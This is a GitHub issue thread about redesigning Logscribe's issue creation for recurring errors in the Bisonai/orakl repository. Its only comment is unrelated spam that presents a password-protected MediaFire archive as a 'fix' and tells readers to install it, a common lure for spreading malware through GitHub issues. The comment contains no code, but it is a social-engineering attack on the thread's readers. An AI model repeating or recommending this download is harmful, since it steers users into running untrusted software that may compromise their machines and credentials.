### ISSUE TITLE
(Logscribe) Redesign logscribe github issue creation for recurring errors

### ISSUE THREAD

**Issue by Intizar-T** [Bisonai/orakl#2251]
https://bisonai.slack.com/archives/C04772WQ3DW/p1724829520920049

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
